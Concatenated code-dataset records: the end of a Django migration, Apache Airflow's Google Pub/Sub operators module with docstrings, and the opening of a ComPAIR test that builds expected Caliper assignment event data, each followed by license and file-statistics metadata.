'stats': ('pykeg.core.jsonfield.JSONField', [], {'default': "'{}'"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stats'", 'unique': 'True', 'to': "orm['auth.User']"})
}
}
complete_apps = ['core']
|
gpl-2.0
| -7,894,830,673,467,085,000 | 78.207831 | 179 | 0.541088 | false |
apache/airflow
|
airflow/providers/google/cloud/operators/pubsub.py
|
2
|
40994
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains Google PubSub operators."""
import warnings
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
from google.api_core.retry import Retry
from google.cloud.pubsub_v1.types import (
DeadLetterPolicy,
Duration,
ExpirationPolicy,
MessageStoragePolicy,
PushConfig,
ReceivedMessage,
RetryPolicy,
)
from airflow.models import BaseOperator
from airflow.providers.google.cloud.hooks.pubsub import PubSubHook
class PubSubCreateTopicOperator(BaseOperator):
"""Create a PubSub topic.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubCreateTopicOperator`
By default, if the topic already exists, this operator will
not cause the DAG to fail. ::
with DAG('successful DAG') as dag:
(
PubSubTopicCreateOperator(project='my-project',
topic='my_new_topic')
>> PubSubTopicCreateOperator(project='my-project',
topic='my_new_topic')
)
The operator can be configured to fail if the topic already exists. ::
with DAG('failing DAG') as dag:
(
PubSubTopicCreateOperator(project='my-project',
topic='my_new_topic')
>> PubSubTopicCreateOperator(project='my-project',
topic='my_new_topic',
fail_if_exists=True)
)
Both ``project`` and ``topic`` are templated so you can use
variables in them.
:param project_id: Optional, the Google Cloud project ID where the topic will be created.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param topic: the topic to create. Do not include the
full topic path. In other words, instead of
``projects/{project}/topics/{topic}``, provide only
``{topic}``. (templated)
:type topic: str
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param labels: Client-assigned labels; see
https://cloud.google.com/pubsub/docs/labels
:type labels: Dict[str, str]
:param message_storage_policy: Policy constraining the set
of Google Cloud regions where messages published to
the topic may be stored. If not present, then no constraints
are in effect.
:type message_storage_policy:
Union[Dict, google.cloud.pubsub_v1.types.MessageStoragePolicy]
:param kms_key_name: The resource name of the Cloud KMS CryptoKey
to be used to protect access to messages published on this topic.
The expected format is
``projects/*/locations/*/keyRings/*/cryptoKeys/*``.
:type kms_key_name: str
:param retry: (Optional) A retry object used to retry requests.
If None is specified, requests will not be retried.
:type retry: google.api_core.retry.Retry
:param timeout: (Optional) The amount of time, in seconds, to wait for the request
to complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:type timeout: float
:param metadata: (Optional) Additional metadata that is provided to the method.
:type metadata: Sequence[Tuple[str, str]]]
:param project: (Deprecated) the Google Cloud project ID where the topic will be created
:type project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'topic',
'impersonation_chain',
]
ui_color = '#0273d4'
def __init__(
self,
*,
topic: str,
project_id: Optional[str] = None,
fail_if_exists: bool = False,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
labels: Optional[Dict[str, str]] = None,
message_storage_policy: Union[Dict, MessageStoragePolicy] = None,
kms_key_name: Optional[str] = None,
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if project:
warnings.warn(
"The project parameter has been deprecated. You should pass the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = project
super().__init__(**kwargs)
self.project_id = project_id
self.topic = topic
self.fail_if_exists = fail_if_exists
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.labels = labels
self.message_storage_policy = message_storage_policy
self.kms_key_name = kms_key_name
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Creating topic %s", self.topic)
hook.create_topic(
project_id=self.project_id,
topic=self.topic,
fail_if_exists=self.fail_if_exists,
labels=self.labels,
message_storage_policy=self.message_storage_policy,
kms_key_name=self.kms_key_name,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
self.log.info("Created topic %s", self.topic)
class PubSubCreateSubscriptionOperator(BaseOperator):
"""Create a PubSub subscription.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubCreateSubscriptionOperator`
By default, the subscription will be created in ``topic_project``. If
``subscription_project`` is specified and the Google Cloud credentials allow, the
Subscription can be created in a different project from its topic.
By default, if the subscription already exists, this operator will
not cause the DAG to fail. However, the topic must exist in the project. ::
with DAG('successful DAG') as dag:
(
PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic',
subscription='my-subscription')
>> PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic',
subscription='my-subscription')
)
The operator can be configured to fail if the subscription already exists.
::
with DAG('failing DAG') as dag:
(
PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic',
subscription='my-subscription')
>> PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic',
subscription='my-subscription', fail_if_exists=True)
)
Finally, subscription is not required. If not passed, the operator will
generated a universally unique identifier for the subscription's name. ::
with DAG('DAG') as dag:
(
PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic')
)
``topic_project``, ``topic``, ``subscription``, and
``subscription`` are templated so you can use variables in them.
:param project_id: Optional, the Google Cloud project ID where the topic exists.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param topic: the topic to create. Do not include the
full topic path. In other words, instead of
``projects/{project}/topics/{topic}``, provide only
``{topic}``. (templated)
:type topic: str
:param subscription: the Pub/Sub subscription name. If empty, a random
name will be generated using the uuid module
:type subscription: str
:param subscription_project_id: the Google Cloud project ID where the subscription
will be created. If empty, ``topic_project`` will be used.
:type subscription_project_id: str
:param ack_deadline_secs: Number of seconds that a subscriber has to
acknowledge each message pulled from the subscription
:type ack_deadline_secs: int
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param push_config: If push delivery is used with this subscription,
this field is used to configure it. An empty ``pushConfig`` signifies
that the subscriber will pull and ack messages using API methods.
:type push_config: Union[Dict, google.cloud.pubsub_v1.types.PushConfig]
:param retain_acked_messages: Indicates whether to retain acknowledged
messages. If true, then messages are not expunged from the subscription's
backlog, even if they are acknowledged, until they fall out of the
``message_retention_duration`` window. This must be true if you would
like to Seek to a timestamp.
:type retain_acked_messages: bool
:param message_retention_duration: How long to retain unacknowledged messages
in the subscription's backlog, from the moment a message is published. If
``retain_acked_messages`` is true, then this also configures the
retention of acknowledged messages, and thus configures how far back in
time a ``Seek`` can be done. Defaults to 7 days. Cannot be more than 7
days or less than 10 minutes.
:type message_retention_duration: Union[Dict, google.cloud.pubsub_v1.types.Duration]
:param labels: Client-assigned labels; see
https://cloud.google.com/pubsub/docs/labels
:type labels: Dict[str, str]
:param enable_message_ordering: If true, messages published with the same
ordering_key in PubsubMessage will be delivered to the subscribers in the order
in which they are received by the Pub/Sub system. Otherwise, they may be
delivered in any order.
:type enable_message_ordering: bool
:param expiration_policy: A policy that specifies the conditions for this
subscription’s expiration. A subscription is considered active as long as any
connected subscriber is successfully consuming messages from the subscription or
is issuing operations on the subscription. If expiration_policy is not set,
a default policy with ttl of 31 days will be used. The minimum allowed value for
expiration_policy.ttl is 1 day.
:type expiration_policy: Union[Dict, google.cloud.pubsub_v1.types.ExpirationPolicy`]
:param filter_: An expression written in the Cloud Pub/Sub filter language. If
non-empty, then only PubsubMessages whose attributes field matches the filter are
delivered on this subscription. If empty, then no messages are filtered out.
:type filter_: str
:param dead_letter_policy: A policy that specifies the conditions for dead lettering
messages in this subscription. If dead_letter_policy is not set, dead lettering is
disabled.
:type dead_letter_policy: Union[Dict, google.cloud.pubsub_v1.types.DeadLetterPolicy]
:param retry_policy: A policy that specifies how Pub/Sub retries message delivery
for this subscription. If not set, the default retry policy is applied. This
generally implies that messages will be retried as soon as possible for healthy
subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline
exceeded events for a given message.
:type retry_policy: Union[Dict, google.cloud.pubsub_v1.types.RetryPolicy]
:param retry: (Optional) A retry object used to retry requests.
If None is specified, requests will not be retried.
:type retry: google.api_core.retry.Retry
:param timeout: (Optional) The amount of time, in seconds, to wait for the request
to complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:type timeout: float
:param metadata: (Optional) Additional metadata that is provided to the method.
:type metadata: Sequence[Tuple[str, str]]]
:param topic_project: (Deprecated) the Google Cloud project ID where the topic exists
:type topic_project: str
:param subscription_project: (Deprecated) the Google Cloud project ID where the subscription
will be created. If empty, ``topic_project`` will be used.
:type subscription_project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'topic',
'subscription',
'subscription_project_id',
'impersonation_chain',
]
ui_color = '#0273d4'
def __init__(
self,
*,
topic: str,
project_id: Optional[str] = None,
subscription: Optional[str] = None,
subscription_project_id: Optional[str] = None,
ack_deadline_secs: int = 10,
fail_if_exists: bool = False,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
push_config: Optional[Union[Dict, PushConfig]] = None,
retain_acked_messages: Optional[bool] = None,
message_retention_duration: Optional[Union[Dict, Duration]] = None,
labels: Optional[Dict[str, str]] = None,
enable_message_ordering: bool = False,
expiration_policy: Optional[Union[Dict, ExpirationPolicy]] = None,
filter_: Optional[str] = None,
dead_letter_policy: Optional[Union[Dict, DeadLetterPolicy]] = None,
retry_policy: Optional[Union[Dict, RetryPolicy]] = None,
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
topic_project: Optional[str] = None,
subscription_project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if topic_project:
warnings.warn(
"The topic_project parameter has been deprecated. You should pass "
"the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = topic_project
if subscription_project:
warnings.warn(
"The project_id parameter has been deprecated. You should pass "
"the subscription_project parameter.",
DeprecationWarning,
stacklevel=2,
)
subscription_project_id = subscription_project
super().__init__(**kwargs)
self.project_id = project_id
self.topic = topic
self.subscription = subscription
self.subscription_project_id = subscription_project_id
self.ack_deadline_secs = ack_deadline_secs
self.fail_if_exists = fail_if_exists
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.push_config = push_config
self.retain_acked_messages = retain_acked_messages
self.message_retention_duration = message_retention_duration
self.labels = labels
self.enable_message_ordering = enable_message_ordering
self.expiration_policy = expiration_policy
self.filter_ = filter_
self.dead_letter_policy = dead_letter_policy
self.retry_policy = retry_policy
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.impersonation_chain = impersonation_chain
def execute(self, context) -> str:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Creating subscription for topic %s", self.topic)
result = hook.create_subscription(
project_id=self.project_id,
topic=self.topic,
subscription=self.subscription,
subscription_project_id=self.subscription_project_id,
ack_deadline_secs=self.ack_deadline_secs,
fail_if_exists=self.fail_if_exists,
push_config=self.push_config,
retain_acked_messages=self.retain_acked_messages,
message_retention_duration=self.message_retention_duration,
labels=self.labels,
enable_message_ordering=self.enable_message_ordering,
expiration_policy=self.expiration_policy,
filter_=self.filter_,
dead_letter_policy=self.dead_letter_policy,
retry_policy=self.retry_policy,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
self.log.info("Created subscription for topic %s", self.topic)
return result
class PubSubDeleteTopicOperator(BaseOperator):
"""Delete a PubSub topic.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubDeleteTopicOperator`
By default, if the topic does not exist, this operator will
not cause the DAG to fail. ::
with DAG('successful DAG') as dag:
(
PubSubTopicDeleteOperator(project='my-project',
topic='non_existing_topic')
)
The operator can be configured to fail if the topic does not exist. ::
with DAG('failing DAG') as dag:
(
PubSubTopicCreateOperator(project='my-project',
topic='non_existing_topic',
fail_if_not_exists=True)
)
Both ``project`` and ``topic`` are templated so you can use
variables in them.
:param project_id: Optional, the Google Cloud project ID in which to work (templated).
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param topic: the topic to delete. Do not include the
full topic path. In other words, instead of
``projects/{project}/topics/{topic}``, provide only
``{topic}``. (templated)
:type topic: str
:param fail_if_not_exists: If True and the topic does not exist, fail
the task
:type fail_if_not_exists: bool
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param retry: (Optional) A retry object used to retry requests.
If None is specified, requests will not be retried.
:type retry: google.api_core.retry.Retry
:param timeout: (Optional) The amount of time, in seconds, to wait for the request
to complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:type timeout: float
:param metadata: (Optional) Additional metadata that is provided to the method.
:type metadata: Sequence[Tuple[str, str]]]
:param project: (Deprecated) the Google Cloud project ID where the topic will be created
:type project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'topic',
'impersonation_chain',
]
ui_color = '#cb4335'
def __init__(
self,
*,
topic: str,
project_id: Optional[str] = None,
fail_if_not_exists: bool = False,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if project:
warnings.warn(
"The project parameter has been deprecated. You should pass the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = project
super().__init__(**kwargs)
self.project_id = project_id
self.topic = topic
self.fail_if_not_exists = fail_if_not_exists
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Deleting topic %s", self.topic)
hook.delete_topic(
project_id=self.project_id,
topic=self.topic,
fail_if_not_exists=self.fail_if_not_exists,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
self.log.info("Deleted topic %s", self.topic)
class PubSubDeleteSubscriptionOperator(BaseOperator):
"""Delete a PubSub subscription.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubDeleteSubscriptionOperator`
By default, if the subscription does not exist, this operator will
not cause the DAG to fail. ::
with DAG('successful DAG') as dag:
(
PubSubSubscriptionDeleteOperator(project='my-project',
subscription='non-existing')
)
The operator can be configured to fail if the subscription already exists.
::
with DAG('failing DAG') as dag:
(
PubSubSubscriptionDeleteOperator(
project='my-project', subscription='non-existing',
fail_if_not_exists=True)
)
``project``, and ``subscription`` are templated so you can use
variables in them.
:param project_id: Optional, the Google Cloud project ID in which to work (templated).
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param subscription: the subscription to delete. Do not include the
full subscription path. In other words, instead of
``projects/{project}/subscription/{subscription}``, provide only
``{subscription}``. (templated)
:type subscription: str
:param fail_if_not_exists: If True and the subscription does not exist,
fail the task
:type fail_if_not_exists: bool
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param retry: (Optional) A retry object used to retry requests.
If None is specified, requests will not be retried.
:type retry: google.api_core.retry.Retry
:param timeout: (Optional) The amount of time, in seconds, to wait for the request
to complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:type timeout: float
:param metadata: (Optional) Additional metadata that is provided to the method.
:type metadata: Sequence[Tuple[str, str]]]
:param project: (Deprecated) the Google Cloud project ID where the topic will be created
:type project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'subscription',
'impersonation_chain',
]
ui_color = '#cb4335'
def __init__(
self,
*,
subscription: str,
project_id: Optional[str] = None,
fail_if_not_exists: bool = False,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if project:
warnings.warn(
"The project parameter has been deprecated. You should pass the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = project
super().__init__(**kwargs)
self.project_id = project_id
self.subscription = subscription
self.fail_if_not_exists = fail_if_not_exists
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Deleting subscription %s", self.subscription)
hook.delete_subscription(
project_id=self.project_id,
subscription=self.subscription,
fail_if_not_exists=self.fail_if_not_exists,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
self.log.info("Deleted subscription %s", self.subscription)
class PubSubPublishMessageOperator(BaseOperator):
"""Publish messages to a PubSub topic.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubPublishMessageOperator`
Each Task publishes all provided messages to the same topic
in a single Google Cloud project. If the topic does not exist, this
task will fail. ::
m1 = {'data': b'Hello, World!',
'attributes': {'type': 'greeting'}
}
m2 = {'data': b'Knock, knock'}
m3 = {'attributes': {'foo': ''}}
t1 = PubSubPublishOperator(
project='my-project',topic='my_topic',
messages=[m1, m2, m3],
create_topic=True,
dag=dag)
``project`` , ``topic``, and ``messages`` are templated so you can use
variables in them.
:param project_id: Optional, the Google Cloud project ID in which to work (templated).
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param topic: the topic to which to publish. Do not include the
full topic path. In other words, instead of
``projects/{project}/topics/{topic}``, provide only
``{topic}``. (templated)
:type topic: str
:param messages: a list of messages to be published to the
topic. Each message is a dict with one or more of the
following keys-value mappings:
* 'data': a bytestring (utf-8 encoded)
* 'attributes': {'key1': 'value1', ...}
Each message must contain at least a non-empty 'data' value
or an attribute dict with at least one key (templated). See
https://cloud.google.com/pubsub/docs/reference/rest/v1/PubsubMessage
:type messages: list
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param project: (Deprecated) the Google Cloud project ID where the topic will be created
:type project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'topic',
'messages',
'impersonation_chain',
]
ui_color = '#0273d4'
def __init__(
self,
*,
topic: str,
messages: List,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if project:
warnings.warn(
"The project parameter has been deprecated. You should pass the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = project
super().__init__(**kwargs)
self.project_id = project_id
self.topic = topic
self.messages = messages
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Publishing to topic %s", self.topic)
hook.publish(project_id=self.project_id, topic=self.topic, messages=self.messages)
self.log.info("Published to topic %s", self.topic)
class PubSubPullOperator(BaseOperator):
"""Pulls messages from a PubSub subscription and passes them through XCom.
If the queue is empty, returns empty list - never waits for messages.
If you do need to wait, please use :class:`airflow.providers.google.cloud.sensors.PubSubPullSensor`
instead.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubPullSensor`
This sensor operator will pull up to ``max_messages`` messages from the
specified PubSub subscription. When the subscription returns messages,
the poke method's criteria will be fulfilled and the messages will be
returned from the operator and passed through XCom for downstream tasks.
If ``ack_messages`` is set to True, messages will be immediately
acknowledged before being returned, otherwise, downstream tasks will be
responsible for acknowledging them.
``project`` and ``subscription`` are templated so you can use
variables in them.
:param project: the Google Cloud project ID for the subscription (templated)
:type project: str
:param subscription: the Pub/Sub subscription name. Do not include the
full subscription path.
:type subscription: str
:param max_messages: The maximum number of messages to retrieve per
PubSub pull request
:type max_messages: int
:param ack_messages: If True, each message will be acknowledged
immediately rather than by any downstream tasks
:type ack_messages: bool
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param messages_callback: (Optional) Callback to process received messages.
It's return value will be saved to XCom.
If you are pulling large messages, you probably want to provide a custom callback.
If not provided, the default implementation will convert `ReceivedMessage` objects
into JSON-serializable dicts using `google.protobuf.json_format.MessageToDict` function.
:type messages_callback: Optional[Callable[[List[ReceivedMessage], Dict[str, Any]], Any]]
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'subscription',
'impersonation_chain',
]
def __init__(
self,
*,
project_id: str,
subscription: str,
max_messages: int = 5,
ack_messages: bool = False,
messages_callback: Optional[Callable[[List[ReceivedMessage], Dict[str, Any]], Any]] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.project_id = project_id
self.subscription = subscription
self.max_messages = max_messages
self.ack_messages = ack_messages
self.messages_callback = messages_callback
self.impersonation_chain = impersonation_chain
def execute(self, context) -> list:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
pulled_messages = hook.pull(
project_id=self.project_id,
subscription=self.subscription,
max_messages=self.max_messages,
return_immediately=True,
)
handle_messages = self.messages_callback or self._default_message_callback
ret = handle_messages(pulled_messages, context)
if pulled_messages and self.ack_messages:
hook.acknowledge(
project_id=self.project_id,
subscription=self.subscription,
messages=pulled_messages,
)
return ret
def _default_message_callback(
self,
pulled_messages: List[ReceivedMessage],
context: Dict[str, Any],
) -> list:
"""
This method can be overridden by subclasses or by `messages_callback` constructor argument.
This default implementation converts `ReceivedMessage` objects into JSON-serializable dicts.
:param pulled_messages: messages received from the topic.
:type pulled_messages: List[ReceivedMessage]
:param context: same as in `execute`
:return: value to be saved to XCom.
"""
messages_json = [ReceivedMessage.to_dict(m) for m in pulled_messages]
return messages_json
|
apache-2.0
| 2,101,356,312,022,905,300 | 42.058824 | 103 | 0.64576 | false |
ubc/compair
|
compair/tests/learning_records/test_assignment_events.py
|
1
|
11445
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
import pytz
from data.fixtures.test_data import SimpleAssignmentTestData, LTITestData
from compair.tests.test_compair import ComPAIRLearningRecordTestCase
from compair.core import db
from flask_login import current_app
from compair.learning_records.capture_events import on_assignment_create, \
on_assignment_modified, on_assignment_delete
class AssignmentLearningRecordTests(ComPAIRLearningRecordTestCase):
def setUp(self):
super(ComPAIRLearningRecordTestCase, self).setUp()
self.data = SimpleAssignmentTestData()
self.lti_data = LTITestData()
self.user = self.data.authorized_student
self.setup_session_data(self.user)
self.course = self.data.main_course
self.lti_context = self.lti_data.create_context(
self.lti_data.lti_consumer,
compair_course_id=self.course.id,
lis_course_offering_sourcedid="sis_course_id",
lis_course_section_sourcedid="sis_section_id",
)
self.assignment = self.data.assignments[0]
self.expected_caliper_course = {
'academicSession': self.course.term,
'dateCreated': self.course.created.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'dateModified': self.course.modified.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'id': "https://localhost:8888/app/course/"+self.course.uuid,
'name': self.course.name,
'type': 'CourseOffering',
'otherIdentifiers': [{
'identifier': self.lti_context.context_id,
'identifierType': 'LtiContextId',
'type': 'SystemIdentifier',
'extensions': {
'lis_course_offering_sourcedid': 'sis_course_id',
'lis_course_section_sourcedid': 'sis_section_id',
'oauth_consumer_key': self.lti_data.lti_consumer.oauth_consumer_key,
},
}]
}
self.expected_caliper_assignment = {
'name': self.assignment.name,
'type': 'Assessment',
'dateCreated': self.assignment.created.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'dateModified': self.assignment.modified.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'dateToStartOn': self.assignment.answer_start.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'description': self.assignment.description,
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid,
'isPartOf': self.expected_caliper_course,
'items': [{
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/question",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/comparison/question/1",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/1",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/2",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/comparison/question/2",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/3",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/4",
'type': 'AssessmentItem'
}, {
